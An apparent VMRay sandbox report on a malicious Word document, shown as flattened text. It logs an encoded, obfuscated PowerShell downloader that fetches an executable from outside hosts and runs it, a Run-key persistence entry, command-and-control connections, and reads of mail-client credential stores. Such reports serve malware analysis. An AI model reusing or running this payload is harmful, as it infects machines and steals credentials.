VMRay Analyzer Report for Sample #17571 VMRay Analyzer 2.2.0 Process 1 2552 winword.exe 1524 winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" C:\Users\ATVeyDl98Z\Desktop\ c:\program files\microsoft office\root\office16\winword.exe Child_Of Created Process 2 2772 powershell.exe 2552 powershell.exe powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA= C:\Users\ATVeyDl98Z\Desktop\ c:\windows\system32\windowspowershell\v1.0\powershell.exe Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Read_From Connected_To Connected_To Connected_To Process 3 2912 38763.exe 2772 38763.exe "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveyd~1\appdata\local\temp\38763.exe Child_Of Created Created Created Created Process 4 2932 38763.exe 2912 38763.exe "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveyd~1\appdata\local\temp\38763.exe Child_Of Created Created Created Created Deleted Moved Created Created Created Process 5 2956 viewcom.exe 2932 viewcom.exe "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe Child_Of Created Created Created Created Process 6 2968 viewcom.exe 2956 viewcom.exe "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe Child_Of Child_Of Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Modified_Properties_Of Modified_Properties_Of Connected_To Connected_To Connected_To Connected_To Process 7 988 svchost.exe 468 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Process 8 3184 viewcom.exe 2968 viewcom.exe "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 9 3192 viewcom.exe 2968 viewcom.exe "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe Created Created Created Created Created Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Process 10 3200 viewcom.exe 2968 viewcom.exe "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp" C:\Users\ATVeyDl98Z\Desktop\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe Opened Opened Opened Opened Process 11 1068 svchost.exe 468 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService C:\Windows\system32\ c:\windows\system32\svchost.exe File conout$ File windows\system32\windowspowershell\v1.0\getevent.types.ps1xml windows\system32\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\types.ps1xml windows\system32\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\types.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\wsman.format.ps1xml windows\system32\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\certificate.format.ps1xml windows\system32\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\help.format.ps1xml windows\system32\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\system32\windowspowershell\v1.0\registry.format.ps1xml windows\system32\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework\v2.0.50727\config\machine.config windows\microsoft.net\framework\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config config File users\atveydl98z\appdata\local\temp\38763.exe users\atveydl98z\appdata\local\temp\38763.exe c:\ c:\users\atveydl98z\appdata\local\temp\38763.exe exe MD5 1b1e6729790854252dfba6c77f198a4e SHA1 327c94b435802f77d12913956b28c70d00ab2de5 SHA256 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98 File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment HKEY_CURRENT_USER PSMODULEPATH WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell HKEY_LOCAL_MACHINE path path WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Security HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion HKEY_LOCAL_MACHINE InstallationType InstallationType WinRegistryKey SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance HKEY_LOCAL_MACHINE Library Library IsMultiInstance IsMultiInstance First Counter First Counter WinRegistryKey SYSTEM\CurrentControlSet\Services\.net clr networking\Performance HKEY_LOCAL_MACHINE CategoryOptions CategoryOptions FileMappingSize FileMappingSize Counter Names WinRegistryKey HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\PowerShell\1\ShellIds HKEY_LOCAL_MACHINE PipelineMaxStackSizeMB DNSRecord kerineal.com URI kerineal.com SocketAddress 184.168.152.148 80 TCP NetworkSocket 184.168.152.148 80 TCP Contains SocketAddress kerineal.com 80 NetworkConnection HTTP kerineal.com 80 URI kerineal.com/simplyelegant/hQoBm/ Contains URI None File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex MF6003E70 File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\atveyd~1\appdata\local\temp\38763.exe users\atveyd~1\appdata\local\temp\38763.exe c:\ c:\users\atveyd~1\appdata\local\temp\38763.exe exe Moved_From File c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe:zone.identifier File users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe c:\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe exe MD5 1b1e6729790854252dfba6c77f198a4e SHA1 327c94b435802f77d12913956b28c70d00ab2de5 SHA256 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98 Moved_To Mutex Global\I40F77A1B Mutex Global\M40F77A1B File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp Mutex M68B1B0D0 File email.doc email.doc c:\ c:\email.doc doc File a\foobar.bmp a\foobar.bmp c:\ c:\a\foobar.bmp bmp File users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe c:\ c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe exe File programdata\9f1c.tmp programdata\9f1c.tmp c:\ c:\programdata\9f1c.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\9f1b.tmp programdata\9f1b.tmp c:\ c:\programdata\9f1b.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File programdata\9f2d.tmp programdata\9f2d.tmp c:\ c:\programdata\9f2d.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER viewcom "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" REG_SZ WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER viewcom "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" REG_SZ SocketAddress 65.99.230.27 443 NetworkConnection HTTP 65.99.230.27 443 SocketAddress 185.82.23.28 443 NetworkConnection HTTP 185.82.23.28 443 URI 65.99.230.27 Contains URI 185.82.23.28 Contains File users\atveydl98z\appdata\local\microsoft\windows mail\account{81ff0b87-dbd4-46a5-a9ff-ef000b2f9024}.oeaccount users\atveydl98z\appdata\local\microsoft\windows mail\account{81ff0b87-dbd4-46a5-a9ff-ef000b2f9024}.oeaccount c:\ c:\users\atveydl98z\appdata\local\microsoft\windows mail\account{81ff0b87-dbd4-46a5-a9ff-ef000b2f9024}.oeaccount oeaccount File users\atveydl98z\appdata\local\microsoft\windows mail\account{a9b27062-9101-460a-98c0-c2aa26b0f943}.oeaccount users\atveydl98z\appdata\local\microsoft\windows mail\account{a9b27062-9101-460a-98c0-c2aa26b0f943}.oeaccount c:\ c:\users\atveydl98z\appdata\local\microsoft\windows mail\account{a9b27062-9101-460a-98c0-c2aa26b0f943}.oeaccount oeaccount File users\atveydl98z\appdata\local\microsoft\windows mail\account{d08688db-6514-4dc0-9d54-33d56d2ef97e}.oeaccount users\atveydl98z\appdata\local\microsoft\windows mail\account{d08688db-6514-4dc0-9d54-33d56d2ef97e}.oeaccount c:\ c:\users\atveydl98z\appdata\local\microsoft\windows mail\account{d08688db-6514-4dc0-9d54-33d56d2ef97e}.oeaccount oeaccount File programdata\9f1b.tmp programdata\9f1b.tmp c:\ c:\programdata\9f1b.tmp tmp WinRegistryKey Software\Qualcomm\Eudora\CommandLine HKEY_CURRENT_USER WinRegistryKey Software\Classes\Software\Qualcomm\Eudora\CommandLine\current HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Thunderbird HKEY_LOCAL_MACHINE WinRegistryKey Software\Google\Google Talk\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Google\Google Desktop\Mailboxes HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities HKEY_CURRENT_USER WinRegistryKey Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9} HKEY_CURRENT_USER Username WinRegistryKey Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\15.0\Outlook\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\21c3340121c69b4d9839e87233c43775 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5820efc9fdbb5f47849ddf6d61a8efbf HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5822179f3ba9dd4b834ca5b688df58ee HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5cf6dc56389a514da4af66e8d249d682 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\79245ba6aebb494e8474990b23b0b5d9 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\822186790bcca847a772607001697335 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 User IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 User POP3 Server Display Name Email SMTP Server SMTP Port POP3 Port POP3 Use SPA POP3 Password IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER POP3 User IMAP User HTTP User SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b76d3b10d1949342bbbb36b682c4ceca HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER WinRegistryKey Software\IncrediMail\Identities HKEY_CURRENT_USER WinRegistryKey Software\IncrediMail\Identities HKEY_LOCAL_MACHINE WinRegistryKey Software\Group Mail HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\MSNMessenger HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\MessengerService HKEY_CURRENT_USER WinRegistryKey Software\Yahoo\Pager HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\IdentityCRL HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows Live Mail HKEY_CURRENT_USER File users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\index.dat users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\index.dat c:\ c:\users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\index.dat dat File users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\mshist012017083120170901\index.dat users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\mshist012017083120170901\index.dat c:\ 